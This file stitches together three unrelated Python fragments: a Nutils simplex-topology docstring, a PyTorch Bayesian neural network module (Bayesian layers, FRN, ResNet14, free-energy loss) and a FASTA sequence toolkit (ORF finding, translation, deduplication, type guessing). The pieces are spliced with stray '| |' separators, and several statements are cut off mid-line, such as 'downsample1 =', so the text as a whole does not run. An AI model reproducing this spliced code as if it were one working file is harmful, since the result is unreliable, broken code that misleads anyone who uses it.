second dimension. This table fully determines the connectivity of the
simplices.
cnodes : :class:`numpy.ndarray`
Coordinate indices as (nelems x ncnodes) integer array following Nutils'
conventions for Bernstein polynomials. The polynomial degree is inferred
from the array shape.
coords : :class:`numpy.ndarray`
Coordinates as (nverts x ndims) float array to be indexed by ``cnodes``.
tags : :class:`dict`
Dictionary of name->element numbers. Element order is preserved in the
resulting volumetric groups.
btags : :class:`dict`
Dictionary of name->edges, where edges is a (nedges x 2) integer array
containing pairs of element number and edge number. The segments are
assigned to boundary or interfaces groups automatically while otherwise
preserving order.
ptags : :class:`dict`
Dictionary of name->node numbers referencing the ``nodes`` table.
name : :class:`str`
Name of simplex topology.
Returns
-------
topo : :class:`nutils.topology.SimplexTopology`
Topology with volumetric, boundary and interface groups.
geom : :class:`nutils.function.Array`
Geometry function.
'''
nverts = len(coords)
nelems, ncnodes = cnodes.shape
ndims = nodes.shape[1] - 1
assert len(nodes) == nelems
assert numpy.greater(nodes[:,1:], nodes[:,:-1]).all(), 'nodes must be sorted'
if ncnodes == ndims+1:
degree | |
import math
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
from sklearn.metrics import roc_auc_score
from torchvision import datasets, transforms
from tqdm import tqdm, trange
# for CBB and MCBB
# Run on GPU when available; sampled noise and accumulators are moved here.
DEVICE = torch.device("cuda" if torch.cuda.is_available() else "cpu")
# Small constant guarding log() against zero arguments.
eps = 1e-20
class Gaussian:
    """Diagonal Gaussian variational posterior parameterised by (mu, rho).

    The standard deviation is derived as sigma = log(1 + exp(rho)) so it
    stays strictly positive while rho ranges over the reals.
    """

    def __init__(self, mu, rho):
        self.mu = mu
        self.rho = rho
        self.normal = torch.distributions.Normal(0, 1)

    @property
    def sigma(self):
        # Softplus transform of rho keeps the std positive.
        return torch.log1p(torch.exp(self.rho))

    def sample(self):
        # Reparameterisation trick: mu + sigma * noise, noise ~ N(0, 1).
        noise = self.normal.sample(self.rho.size()).to(DEVICE)
        return self.mu + self.sigma * noise

    def log_prob(self, input):
        # Sum of elementwise Gaussian log-densities; eps guards log(0).
        sigma = self.sigma
        log_density = (
            -math.log(math.sqrt(2 * math.pi))
            - torch.log(sigma + eps)
            - (input - self.mu) ** 2 / (2 * sigma ** 2)
        )
        return log_density.sum()
class GaussianPrior:
    """Fixed (non-trainable) Gaussian prior with mean ``mu`` and std ``sigma``."""

    def __init__(self, mu, sigma):
        self.mu = mu
        self.sigma = sigma

    def log_prob(self, input):
        # Sum of independent Gaussian log-densities over all elements.
        variance = self.sigma ** 2
        return (
            -math.log(math.sqrt(2 * math.pi))
            - torch.log(self.sigma)
            - (input - self.mu) ** 2 / (2 * variance)
        ).sum()
class BayesianLinear(nn.Module):
    """
    Linear layer with a factorised Gaussian posterior over weights and biases
    (Bayes-by-Backprop style).

    ``sigma1`` is the std of the zero-mean Gaussian prior; ``lower_bound`` /
    ``upper_bounnd`` bound the uniform initialisation of rho.
    NOTE(review): "upper_bounnd" is misspelled in the signature; kept as-is
    because it is part of the public interface (keyword callers would break).

    TODO: refact initialization of parameter rho
    """

    def __init__(self, n_input, n_output, sigma1, lower_bound, upper_bounnd):
        super().__init__()
        self.n_input = n_input
        self.n_output = n_output
        # Posterior mean of the weights: scaled normal initialisation.
        self.w_mu = nn.Parameter(
            torch.Tensor(n_output, n_input).normal_(0, math.sqrt(2 / n_input))
        )  # todo
        # rho parameterises the posterior std via sigma = log1p(exp(rho)).
        self.w_rho = nn.Parameter(
            torch.Tensor(n_output, n_input).uniform_(lower_bound, upper_bounnd)
        )
        # self.w_rho = nn.Parameter(torch.Tensor(n_output, n_input).uniform_(-2.253,-2.252))
        self.w = Gaussian(self.w_mu, self.w_rho)
        self.b_mu = nn.Parameter(torch.Tensor(n_output).normal_(0, math.sqrt(2 / n_input)))
        # self.b_rho = nn.Parameter(torch.Tensor(n_output).uniform_(-5,-4))
        self.b_rho = nn.Parameter(torch.Tensor(n_output).uniform_(lower_bound, upper_bounnd))
        self.b = Gaussian(self.b_mu, self.b_rho)
        # Prior: Gaussian
        self.w_prior = GaussianPrior(0, sigma1)
        self.b_prior = GaussianPrior(0, sigma1)
        # Refreshed on every forward pass; read externally for the ELBO.
        self.log_prior = 0
        self.log_variational_posterior = 0
        # Posterior-std statistics, kept for logging/diagnostics.
        self.sigma_mean = 0
        self.sigma_std = 0

    def forward(self, input, sample=False):
        # Sample weights during training (or when explicitly requested);
        # otherwise use the posterior means for a deterministic pass.
        if self.training or sample:
            w = self.w.sample()
            b = self.b.sample()
        else:
            w = self.w_mu
            b = self.b_mu
        self.log_prior = self.w_prior.log_prob(w) + self.b_prior.log_prob(b)
        self.log_variational_posterior = self.w.log_prob(w) + self.b.log_prob(b)
        self.sigma_mean = self.w.sigma.mean()
        self.sigma_std = self.w.sigma.std()
        return F.linear(input, w, b)
class BayesianConv2D(nn.Module):
    """
    2-D convolution with a factorised Gaussian posterior over the kernel
    weights (no bias term); the prior is a zero-mean Gaussian with std
    ``sigma1``.

    Bug fix: ``forward`` previously assigned the sampled posterior density to
    a misspelled attribute (``log_variational_porsterior``), so
    ``log_variational_posterior`` stayed 0 forever and any network summing it
    (e.g. ResidualBlock) silently dropped the conv layers' KL contribution.
    """

    def __init__(self, in_channels, out_channels, sigma1, kernel_size=3, stride=1, padding=1):
        super().__init__()
        self.in_channels = in_channels
        self.out_channels = out_channels
        self.kernel_size = kernel_size
        self.stride = stride
        self.padding = padding
        # Posterior mean: scaled normal init (scale shrinks with layer size).
        self.w_mu = nn.Parameter(
            torch.Tensor(out_channels, in_channels, kernel_size, kernel_size).normal_(
                0,
                math.sqrt(2 / (out_channels * in_channels * kernel_size * kernel_size)),
            )
        )
        # rho parameterises sigma = log1p(exp(rho)); bounds are hard-coded
        # here (BayesianLinear takes them as arguments instead).
        self.w_rho = nn.Parameter(
            torch.Tensor(out_channels, in_channels, kernel_size, kernel_size).uniform_(
                -2.253, -2.252
            )
        )
        self.w = Gaussian(self.w_mu, self.w_rho)
        # prior: Gaussian
        self.w_prior = GaussianPrior(0, sigma1)
        # Refreshed on every forward pass; read externally for the ELBO.
        self.log_prior = 0
        self.log_variational_posterior = 0

    def forward(self, input, sample=False):
        # Sample weights during training (or on request); use the mean otherwise.
        if self.training or sample:
            w = self.w.sample()
        else:
            w = self.w_mu
        self.log_prior = self.w_prior.log_prob(w)
        # Fixed: was assigned to the misspelled "log_variational_porsterior".
        self.log_variational_posterior = self.w.log_prob(w)
        return F.conv2d(input, w, bias=None, stride=self.stride, padding=self.padding)
def BayesianConv3x3(in_channels, out_channels, sigma1, stride=1):
    """Convenience factory: Bayesian 3x3 convolution with padding 1."""
    return BayesianConv2D(
        in_channels,
        out_channels,
        sigma1,
        kernel_size=3,
        stride=stride,
        padding=1,
    )
class TLU(nn.Module):
    """Thresholded Linear Unit: elementwise max(x, tau) with a learnable
    per-channel threshold ``tau`` (companion activation for FRN)."""

    def __init__(self, num_features):
        super().__init__()
        self.num_features = num_features
        self.tau = nn.Parameter(torch.empty(1, num_features, 1, 1))
        self.reset_parameters()

    def reset_parameters(self):
        # Random threshold initialisation (nn.init.zeros_ is the usual
        # alternative, kept commented out in the original).
        nn.init.kaiming_normal_(self.tau)

    def forward(self, x):
        return torch.max(x, self.tau)
class FRN(nn.Module):
    """Filter Response Normalisation layer.

    Each channel is divided by the root mean square of its spatial
    activations (no mean subtraction, no batch statistics), then passed
    through a learnable affine transform. ``eps`` may optionally be learned.
    """

    def __init__(self, num_features, eps=1e-6, is_eps_learnable=False):
        super().__init__()
        self.num_features = num_features
        self.init_eps = eps
        self.is_eps_learnable = is_eps_learnable
        self.weight = nn.parameter.Parameter(
            torch.Tensor(1, num_features, 1, 1), requires_grad=True
        )
        self.bias = nn.parameter.Parameter(torch.Tensor(1, num_features, 1, 1), requires_grad=True)
        # eps is a trainable parameter only when requested; otherwise a
        # constant tensor.
        self.eps = nn.Parameter(torch.Tensor(1)) if is_eps_learnable else torch.tensor(eps)
        self.reset_parameters()

    def reset_parameters(self):
        # Random affine initialisation (ones_/zeros_ are the conventional
        # alternative, kept commented out in the original).
        nn.init.kaiming_normal_(self.weight)
        nn.init.kaiming_normal_(self.bias)
        if self.is_eps_learnable:
            nn.init.constant_(self.eps, self.init_eps)

    def forward(self, x):
        # nu2: per-channel mean square over the spatial dimensions.
        nu2 = x.pow(2).mean(dim=[2, 3], keepdim=True)
        normalised = x * torch.rsqrt(nu2 + self.eps.abs())
        return self.weight * normalised + self.bias
class ResidualBlock(nn.Module):
    """
    Residual block built from two Bayesian 3x3 convolutions.

    The ``FRN`` argument selects the normalisation/activation pair: falsy
    means BatchNorm2d + ReLU; otherwise it is used as the normalisation
    layer class itself (paired with TLU). NOTE(review): the parameter name
    shadows the module-level FRN class — confirm callers always pass the
    class (not ``True``) when FRN normalisation is wanted.
    """

    def __init__(self, in_channels, out_channels, sigma1, FRN, stride=1, downsample=None):
        super().__init__()
        self.conv1 = BayesianConv3x3(in_channels, out_channels, sigma1, stride)
        self.conv2 = BayesianConv3x3(out_channels, out_channels, sigma1)
        if FRN:
            self.frn1 = FRN(out_channels)
            self.tlu1 = TLU(out_channels)
            self.frn2 = FRN(out_channels)
            self.tlu2 = TLU(out_channels)
        else:
            self.frn1 = nn.BatchNorm2d(out_channels)
            self.tlu1 = nn.ReLU(inplace=True)
            self.frn2 = nn.BatchNorm2d(out_channels)
            self.tlu2 = nn.ReLU(inplace=True)
        self.downsample = downsample
        # ELBO bookkeeping, refreshed on every forward pass.
        self.log_prior = 0
        self.log_variational_posterior = 0
        # Posterior-std statistics over both convs, for logging.
        self.sigma_mean = 0
        self.sigma_std = 0

    def forward(self, x):
        residual = x
        out = self.conv1(x)
        out = self.frn1(out)
        out = self.tlu1(out)
        out = self.conv2(out)
        out = self.frn2(out)
        # Optional projection on the skip path (used when shapes change).
        if self.downsample:
            residual = self.downsample(x)
        out += residual
        out = self.tlu2(out)
        # Aggregate the per-conv prior/posterior terms for the ELBO.
        self.log_prior = self.conv1.log_prior + self.conv2.log_prior
        self.log_variational_posterior = (
            self.conv1.log_variational_posterior + self.conv2.log_variational_posterior
        )
        para = torch.cat((self.conv1.w.sigma.flatten(), self.conv2.w.sigma.flatten()))
        self.sigma_mean = para.mean()
        self.sigma_std = para.std()
        return out
class BayesianResNet14(nn.Module):
    """
    ResNet-14 with Bayesian convolutions, switchable between batch
    normalisation (``FRN=False``) and filter response normalisation
    (``FRN`` passed as the FRN layer class).

    Bug fixes relative to the original:
    * the FRN branch referenced an undefined ``out_channels`` (NameError) —
      the stem width is 16;
    * the downsample convolutions passed ``FRN`` as an extra positional
      argument to ``BayesianConv3x3`` (TypeError: too many arguments);
    * ``block4`` omitted the required ``FRN`` argument (TypeError).

    ``block`` is accepted for interface compatibility but unused here.
    """

    def __init__(self, block, sigma1, FRN=False, num_class=10):
        super().__init__()
        self.in_channels = 16
        self.conv = BayesianConv3x3(3, 16, sigma1)
        if FRN:
            # FRN here is the normalisation layer class itself.
            self.frn = FRN(16)
            self.tlu = TLU(16)
            downsample1 = nn.Sequential(BayesianConv3x3(16, 32, sigma1, 2), FRN(32))
            downsample2 = nn.Sequential(BayesianConv3x3(32, 64, sigma1, 2), FRN(64))
        else:
            self.frn = nn.BatchNorm2d(16)
            self.tlu = nn.ReLU(inplace=True)
            downsample1 = nn.Sequential(BayesianConv3x3(16, 32, sigma1, 2), nn.BatchNorm2d(32))
            downsample2 = nn.Sequential(BayesianConv3x3(32, 64, sigma1, 2), nn.BatchNorm2d(64))
        self.block1 = ResidualBlock(16, 16, sigma1, FRN)
        self.block2 = ResidualBlock(16, 16, sigma1, FRN)
        self.block3 = ResidualBlock(16, 32, sigma1, FRN, 2, downsample1)
        self.block4 = ResidualBlock(32, 32, sigma1, FRN)
        self.block5 = ResidualBlock(32, 64, sigma1, FRN, 2, downsample2)
        self.block6 = ResidualBlock(64, 64, sigma1, FRN)
        self.avg_pool = nn.AvgPool2d(8)
        self.fc = BayesianLinear(64, num_class, sigma1, -2.253, -2.252)

    def forward(self, x, sample=False):
        """Return class probabilities (softmax over the final linear layer)."""
        out = self.conv(x)
        out = self.frn(out)
        out = self.tlu(out)
        out = self.block1(out)
        out = self.block2(out)
        out = self.block3(out)
        out = self.block4(out)
        out = self.block5(out)
        out = self.block6(out)
        out = self.avg_pool(out)
        out = out.view(out.size(0), -1)
        # dim=1 made explicit (the same axis the deprecated implicit default
        # used for 2-D input).
        return F.softmax(self.fc(out, sample), dim=1)

    def log_prior(self):
        """Sum of log-prior terms accumulated by the last forward pass."""
        return (
            self.conv.log_prior
            + self.block1.log_prior
            + self.block2.log_prior
            + self.block3.log_prior
            + self.block4.log_prior
            + self.block5.log_prior
            + self.block6.log_prior
            + self.fc.log_prior
        )

    def log_variational_posterior(self):
        """Sum of variational-posterior terms from the last forward pass."""
        return (
            self.conv.log_variational_posterior
            + self.block1.log_variational_posterior
            + self.block2.log_variational_posterior
            + self.block3.log_variational_posterior
            + self.block4.log_variational_posterior
            + self.block5.log_variational_posterior
            + self.block6.log_variational_posterior
            + self.fc.log_variational_posterior
        )

    def free_energy(self, input, target, batch_size, num_batches, n_samples, T):
        """Monte-Carlo estimate of the tempered variational free energy.

        Averages ``n_samples`` stochastic forward passes; the prior and the
        likelihood are tempered by ``T`` while the variational posterior
        term is not ("not absorb T into prior").
        """
        # Sized from the head so non-default num_class works too.
        outputs = torch.zeros(batch_size, self.fc.n_output).to(DEVICE)
        log_prior = torch.zeros(1).to(DEVICE)
        log_variational_posterior = torch.zeros(1).to(DEVICE)
        negative_log_likelihood = torch.zeros(1).to(DEVICE)
        for _ in range(n_samples):
            output = self(input, sample=True)
            outputs += output / n_samples
            log_prior += self.log_prior() / n_samples
            log_variational_posterior += self.log_variational_posterior() / n_samples
            # reduction="sum" replaces the deprecated size_average=False flag.
            negative_log_likelihood += (
                F.nll_loss(torch.log(output + eps), target, reduction="sum") / n_samples
            )
        # new target function, not absorb T into prior
        loss = (
            log_variational_posterior - log_prior / T
        ) + negative_log_likelihood / T * num_batches
        corrects = outputs.argmax(dim=1).eq(target).sum().item()
        return (
            loss,
            log_prior,
            log_variational_posterior,
            negative_log_likelihood,
            corrects,
        )
class BayesianNetwork(nn.Module):
    """
    Plain three-layer Bayesian MLP for flattened 28x28 inputs.

    ``T`` is accepted for interface compatibility but unused in __init__;
    the tempering factor is supplied to :meth:`free_energy` instead.

    Modernisation: explicit ``dim=1`` for softmax and ``reduction="sum"``
    instead of the removed ``size_average`` flag (same numerical behavior).
    """

    def __init__(self, n_units, sigma1, T):
        super().__init__()
        self.l1 = BayesianLinear(28 * 28, n_units, sigma1, -5, -4)
        self.l2 = BayesianLinear(n_units, n_units, sigma1, -5, -4)
        self.l3 = BayesianLinear(n_units, 10, sigma1, -5, -4)

    def forward(self, x, sample=False):
        """Return class probabilities for a batch of (flattenable) inputs."""
        x = x.view(-1, 28 * 28)
        x = F.relu(self.l1(x, sample), inplace=False)
        x = F.relu(self.l2(x, sample), inplace=False)
        # dim=1 made explicit (same axis the deprecated implicit default used).
        return F.softmax(self.l3(x, sample), dim=1)

    def log_prior(self):
        """Sum of log-prior terms accumulated by the last forward pass."""
        return self.l1.log_prior + self.l2.log_prior + self.l3.log_prior

    def log_variational_posterior(self):
        """Sum of variational-posterior terms from the last forward pass."""
        return (
            self.l1.log_variational_posterior
            + self.l2.log_variational_posterior
            + self.l3.log_variational_posterior
        )

    def free_energy(self, input, target, batch_size, num_batches, n_samples, T):
        """Monte-Carlo estimate of the tempered variational free energy.

        Averages ``n_samples`` stochastic forward passes; the prior and the
        likelihood are tempered by ``T`` while the variational posterior
        term is not ("not absorb T into prior").
        """
        outputs = torch.zeros(batch_size, 10).to(DEVICE)
        log_prior = torch.zeros(1).to(DEVICE)
        log_variational_posterior = torch.zeros(1).to(DEVICE)
        negative_log_likelihood = torch.zeros(1).to(DEVICE)
        for _ in range(n_samples):
            output = self(input, sample=True)
            outputs += output / n_samples
            log_prior += self.log_prior() / n_samples
            log_variational_posterior += self.log_variational_posterior() / n_samples
            # reduction="sum" replaces the deprecated size_average=False flag.
            negative_log_likelihood += (
                F.nll_loss(torch.log(output + eps), target, reduction="sum") / n_samples
            )
        # new target function, not absorb T into prior
        loss = (
            log_variational_posterior - log_prior / T
        ) + negative_log_likelihood / T * num_batches
        corrects = outputs.argmax(dim=1).eq(target).sum().item()
        return (
            loss,
            log_prior,
            log_variational_posterior,
            negative_log_likelihood,
            corrects,
        )
# nonBayesian Network
class myLinear(nn.Module):
    """Deterministic (non-Bayesian) linear layer mirroring BayesianLinear's
    call signature; ``sigma1`` and ``sample`` are accepted but unused."""

    def __init__(self, n_input, n_output, sigma1):
        super().__init__()
        self.n_input = n_input
        self.n_output = n_output
        scale = math.sqrt(2 / n_input)
        self.w_mu = nn.Parameter(torch.Tensor(n_output, n_input).normal_(0, scale))
        self.b_mu = nn.Parameter(torch.Tensor(n_output).normal_(0, scale))

    def forward(self, input, sample=False):
        return F.linear(input, self.w_mu, self.b_mu)
class myConv2D(nn.Module):
    """Deterministic conv layer mirroring BayesianConv2D's interface
    (``sigma1``/``sample`` accepted for drop-in compatibility, unused)."""

    def __init__(self, in_channels, out_channels, sigma1, kernel_size=3, stride=1, padding=1):
        super().__init__()
        self.in_channels = in_channels
        self.out_channels = out_channels
        self.kernel_size = kernel_size
        self.stride = stride
        self.padding = padding
        self.w_mu = nn.Parameter(torch.Tensor(out_channels, in_channels, kernel_size, kernel_size))
        self.reset_para()

    def reset_para(self):
        # Same scheme torch.nn.Conv2d uses for its weight by default.
        nn.init.kaiming_uniform_(self.w_mu, a=math.sqrt(5))

    def forward(self, input, sample=False):
        return F.conv2d(input, self.w_mu, bias=None, stride=self.stride, padding=self.padding)
def myConv3x3(in_channels, out_channels, sigma1, stride=1):
    """Convenience factory: deterministic 3x3 convolution with padding 1."""
    return myConv2D(
        in_channels,
        out_channels,
        sigma1,
        kernel_size=3,
        stride=stride,
        padding=1,
    )
class myResidualBlock(nn.Module):
    """Deterministic residual block: two 3x3 convs with BatchNorm + ReLU and
    an optional downsample projection on the skip path."""

    def __init__(self, in_channels, out_channels, sigma1, stride=1, downsample=None):
        super().__init__()
        self.conv1 = myConv3x3(in_channels, out_channels, sigma1, stride)
        self.frn1 = nn.BatchNorm2d(out_channels)
        self.tlu1 = nn.ReLU(inplace=True)
        self.conv2 = myConv3x3(out_channels, out_channels, sigma1)
        self.frn2 = nn.BatchNorm2d(out_channels)
        self.tlu2 = nn.ReLU(inplace=True)
        self.downsample = downsample

    def forward(self, x):
        # Project the identity path when a downsample module is supplied.
        shortcut = self.downsample(x) if self.downsample else x
        out = self.tlu1(self.frn1(self.conv1(x)))
        out = self.frn2(self.conv2(out))
        out += shortcut
        return self.tlu2(out)
class myResNet14(nn.Module):
def __init__(self, sigma1, num_class=10):
super().__init__()
self.in_channels = 16
self.conv = myConv3x3(3, 16, sigma1)
self.frn = nn.BatchNorm2d(16)
self.tlu = nn.ReLU(inplace=True)
self.block1 = myResidualBlock(16, 16, sigma1)
self.block2 = myResidualBlock(16, 16, sigma1)
downsample1 = | |
are required to start with START codons, and if this
# is not a START codon, then do not start a new ORF
if from_start and start == None and not (codon in Alphabet.START):
continue
# if we are not currently in an ORF, initialize one
if not start != None:
start, length = i - 2, 0
# increment the length of the current ORF
length += 3
# if the final ORF is the longest, record it
# break ties by preferring the lower start position
if start != None and ((length, max_start) > (max_length, start)):
max_start, max_length = start, length
return (max_start, max_length)
def _get_orf(dna, all_frames=False, from_start=False, translate=True):
    """Extract an ORF from one ungapped DNA string.

    With ``all_frames`` the longest ORF is located first; otherwise the whole
    sequence is translated in frame 0. ``translate`` selects protein output
    over the raw CDS (only meaningful with ``all_frames``).
    """
    dna = dna.translate(FastaEntry.ungapper).upper()
    if not all_frames:
        aa = translate_dna(dna)
        # NOTE: aa[0] raises IndexError on an empty translation — behavior
        # preserved from the original.
        if from_start and not aa[0] == "M":
            aa = ""
        return aa
    cds_start, cds_length = find_max_orf(dna, from_start=from_start)
    if cds_start is None:
        return ""
    cds = dna[cds_start : cds_start + cds_length]
    return translate_dna(cds) if translate else cds
def translate(gen, all_frames=False, from_start=False, cds=False):
    """Yield each entry with its sequence replaced by its ORF/translation."""
    for entry in gen:
        orf = _get_orf(
            entry.seq, all_frames=all_frames, from_start=from_start, translate=not cds
        )
        yield FastaEntry(header=entry.header, seq=orf)
def uniq(gen, repeated=False, uniq=False, count=False):
    """Collapse duplicate entries while preserving first-seen order.

    ``repeated`` keeps only entries seen more than once; ``uniq`` keeps only
    entries seen exactly once; ``count`` yields "count<TAB>header" strings
    instead of the entries themselves.
    """
    tally = collections.OrderedDict()
    for entry in gen:
        tally[entry] = tally.get(entry, 0) + 1
    if repeated:
        selected = ((k, v) for k, v in tally.items() if v > 1)
    elif uniq:
        selected = ((k, v) for k, v in tally.items() if v == 1)
    else:
        selected = tally.items()
    for k, v in selected:
        if count:
            yield "{}\t{}".format(v, k.header)
        else:
            yield k
def pack(gen, sep):
    """Merge entries with identical sequences; headers are joined by ``sep``."""
    by_seq = collections.OrderedDict()
    for entry in gen:
        by_seq.setdefault(entry.seq, []).append(entry.header)
    for sequence, headers in by_seq.items():
        yield FastaEntry(header=sep.join(headers), seq=sequence)
def unpack(gen, sep):
    """Inverse of pack: emit one entry per ``sep``-delimited header field."""
    for entry in gen:
        for header in entry.header.split(sep):
            yield FastaEntry(header=header, seq=entry.seq)
def uniq_headers(gen, removed=False):
    """Yield entries with duplicate headers dropped (first occurrence wins).

    When *removed* is truthy, each dropped duplicate is printed instead of
    being silently discarded.
    """
    seqs = collections.OrderedDict()
    for seq in gen:
        if seq.header in seqs:
            if removed:
                # NOTE(review): relies on a module-level ``args`` (argparse
                # namespace) that is not visible in this block — confirm it
                # is populated before this generator is consumed.
                seq.print(color=False, out=args.removed)
        else:
            seqs[seq.header] = seq.seq
    for header, sequence in seqs.items():
        seq = FastaEntry(header=header, seq=sequence)
        yield seq
# =================
# UTILITY FUNCTIONS
# =================
def _counter_caser(counter, lower=False):
"""
Sums cases in Collections.Counter object
"""
if lower:
out = counter + collections.Counter(
{k.lower(): v for k, v in counter.items() if k.isupper()}
)
out = out - collections.Counter(
{k: v for k, v in counter.items() if k.isupper()}
)
else:
out = counter + collections.Counter(
{k.upper(): v for k, v in counter.items() if k.islower()}
)
out = out - collections.Counter(
{k: v for k, v in counter.items() if k.islower()}
)
return out
def _sum_lower(counter):
lc = [v for k, v in counter.items() if k in string.ascii_lowercase]
return sum(lc)
def _guess_type(counts):
    """
    Predict sequence type from character counts (dna|rna|prot|ambiguous|illegal)
    """
    # Accept a raw string or a FastaEntry as well as a ready-made Counter.
    if isinstance(counts, str):
        counts = collections.Counter(counts)
    elif isinstance(counts, FastaEntry):
        counts = collections.Counter(counts.seq)
    # Uppercase everything and drop gap characters before classifying.
    counts = _counter_caser(counts)
    counts = collections.Counter(
        {k: n for k, n in counts.items() if k not in Alphabet.GAP}
    )
    chars = set(counts)
    if chars <= Alphabet.DNA:
        # Fewer than 3 residues is too little evidence to call it DNA.
        return "ambiguous" if sum(counts.values()) < 3 else "dna"
    if chars <= Alphabet.RNA:
        return "rna"
    if chars & Alphabet.PROT_EXC:
        # Contains residues unique to protein sequences (EFILQPXJZ*).
        if chars <= Alphabet.PROT | Alphabet.PROT_AMB:
            return "prot"
        return "illegal"
    if chars <= (Alphabet.PROT | Alphabet.PROT_AMB):
        # Every residue could be aa, DNA, or RNA; fall back to composition:
        # if more than 80% of residues look like nucleotides, call it nucleic.
        nucl = sum(counts[x] for x in "ACGTUN" if x in counts)
        if nucl / sum(counts.values()) > 0.8:
            if "U" in counts:
                return "illegal" if "T" in counts else "rna"
            return "dna"
        return "ambiguous"
    # Nothing matched: the sequence contains characters outside every alphabet.
    return "illegal"
def _headtailtrunk(seq, first=None, last=None):
    """
    This function is used by the Head and Tail classes to portray partial
    sections of sequences.

    Returns a copy of *seq* truncated to its first *first* and/or last *last*
    residues, with the header annotated accordingly. NOTE(review): the
    branches test truthiness, so ``first=0`` behaves like "unset" — only the
    explicit ``first == 0 and last == 0`` case reaches the error exit.
    """
    # Work on a copy so the caller's entry is never mutated.
    outseq = FastaEntry(seq.header, seq.seq)
    if first and last:
        # Elide the middle only when the kept ends do not already cover
        # the whole sequence.
        if first + last < len(seq.seq):
            outseq.header = _parse_header_firstword(
                seq.header
            ) + "|TRUNCATED:first-{}_last-{}".format(first, last)
            outseq.seq = "{}{}{}".format(seq.seq[0:first], "...", seq.seq[-last:])
    elif first:
        outseq.header = _parse_header_firstword(
            seq.header
        ) + "|TRUNCATED:first-{}".format(first)
        outseq.seq = seq.seq[0:first]
    elif last:
        outseq.header = _parse_header_firstword(
            seq.header
        ) + "|TRUNCATED:last-{}".format(last)
        outseq.seq = seq.seq[-last:]
    elif first == 0 and last == 0:
        _err("Illegal empty sequence, dying ...")
    return outseq
def _ascii_histchar(dif, chars=" .~*O"):
if dif <= 0:
return chars[0]
elif dif < 0.25:
return chars[1]
elif dif < 0.5:
return chars[2]
elif dif < 0.75:
return chars[3]
else:
return chars[4]
def _err(msg):
sys.exit(msg)
def ambiguous2perl(pattern):
    """Expand IUPAC DNA ambiguity codes in *pattern* into regex classes.

    A backslash-escaped ambiguity code is kept as the bare literal letter;
    any other escaped character keeps its backslash. Codes that appear inside
    an existing character class are expanded without extra brackets.
    """
    expansions = {
        "R": "AG", "Y": "CT", "S": "GC", "W": "AT", "K": "GT", "M": "AC",
        "B": "CGT", "D": "AGT", "H": "ACT", "V": "ACG", "N": "ACGT",
    }
    out = []
    in_class = False
    pending_escape = False
    for ch in pattern:
        is_amb = ch in expansions
        if ch == "\\":
            pending_escape = True
            continue
        if pending_escape:
            # Escaped ambiguity codes become literals; everything else keeps
            # its escape.
            ch = ch if is_amb else "\\" + ch
            pending_escape = False
        elif is_amb:
            expanded = expansions[ch]
            ch = expanded if in_class else "[%s]" % expanded
        elif ch == "[":
            in_class = True
        elif ch == "]":
            in_class = False
        out.append(ch)
    return "".join(out)
def translate_dna(dna):
    """Translate a DNA string codon-by-codon; unknown codons become 'X'.

    Gaps are removed first; a trailing partial codon is ignored.
    """
    # remove gaps
    dna = dna.translate(FastaEntry.ungapper).upper()
    codons = (dna[i : i + 3] for i in range(0, len(dna) - 2, 3))
    return "".join(FastaEntry.codon_table.get(codon, "X") for codon in codons)
def _parse_header_firstword(h, delimiter="[ \t]"):
return re.sub("%s.*" % delimiter, "", h)
def _parse_header_description(h):
return re.sub(r"^\S+\s*", "", h)
def _parse_header_add_suffix(h, suffix):
return re.sub(r"^(\S+)(.*)", "\\1|%s\\2" % suffix, h)
def _parse_header_add_tag(h, tag, value):
return re.sub(r"^(\S+)(.*)", "\\1 %s=%s\\2" % (tag, value), h)
def _parse_header_subseq(h, a, b):
    """Tag the header's first word with a ``subseq(a..b)`` annotation."""
    annotated = "%s|subseq(%d..%d) %s" % (
        _parse_header_firstword(h),
        a,
        b,
        _parse_header_description(h),
    )
    return annotated.strip()
def _parse_header_permute(h, start, end, wordsize):
    """Tag the header's first word with the permutation parameters used."""
    annotated = "%s|permutation:start=%d;end=%d;word_size=%d %s" % (
        _parse_header_firstword(h),
        start,
        end,
        wordsize,
        _parse_header_description(h),
    )
    return annotated.strip()
def _parse_header_ncbi_format(h, fields):
    # Placeholder: NCBI-style header field extraction is not implemented yet.
    raise NotImplementedError
def _parse_header_regex_group(h, regex):
    # Placeholder: regex-group header extraction is not implemented yet.
    raise NotImplementedError
# =================
# CLASS DEFINITIONS
# =================
class Alphabet:
    """Residue alphabets and token sets used to classify sequence type."""

    # Including U, for selenocysteine, and * for STOP
    PROT = set("ACDEFGHIKLMNPQRSTUVWYX*")
    PROT_UNK = set("X")
    # Ambiguous protein residues (Asx, Glx, Xle).
    PROT_AMB = set("BZJ")
    PROT_EXC = set("EFILQPXJZ*")  # unique to protein sequences
    DNA = set("ACGTN")
    DNA_UNK = set("N")
    # IUPAC ambiguity codes shared by DNA and RNA.
    DNA_AMB = set("RYSWKMDBHV")
    RNA = set("ACGUN")
    RNA_UNK = set("N")
    RNA_AMB = set("RYSWKMDBHV")
    # Characters treated as alignment gaps.
    GAP = set(".-_")
    # STOP/START codons in both DNA and RNA spellings.
    STOP = {"TAG", "TAA", "TGA", "UAG", "UAA", "UGA"}
    START = {"ATG", "AUG"}
class Colors:
    """ANSI terminal escape sequences, plus a regex (``pat``) matching them."""

    OFF = chr(27) + r"[0;0m"
    RED = chr(27) + r"[0;31m"
    GREEN = chr(27) + r"[0;32m"
    YELLOW = chr(27) + r"[0;33m"
    MAGENTA = chr(27) + r"[0;35m"
    CYAN = chr(27) + r"[0;36m"
    WHITE = chr(27) + r"[0;37m"
    BLUE = chr(27) + r"[0;34m"
    BOLD_RED = chr(27) + r"[1;31m"
    BOLD_GREEN = chr(27) + r"[1;32m"
    BOLD_YELLOW = chr(27) + r"[1;33m"
    BOLD_MAGENTA = chr(27) + r"[1;35m"
    BOLD_CYAN = chr(27) + r"[1;36m"
    BOLD_WHITE = chr(27) + r"[1;37m"
    BOLD_BLUE = chr(27) + r"[1;34m"
    # Pattern matching any ANSI color escape; used to strip or split on them.
    patstr = chr(27) + r"\[[0-9;]+m"
    pat = re.compile(patstr)
    # Lookup of color names (as accepted on the command line) to sequences.
    COLORS = {
        "red": RED,
        "green": GREEN,
        "yellow": YELLOW,
        "magenta": MAGENTA,
        "cyan": CYAN,
        "white": WHITE,
        "blue": BLUE,
        "bold_red": BOLD_RED,
        "bold_green": BOLD_GREEN,
        "bold_yellow": BOLD_YELLOW,
        "bold_magenta": BOLD_MAGENTA,
        "bold_cyan": BOLD_CYAN,
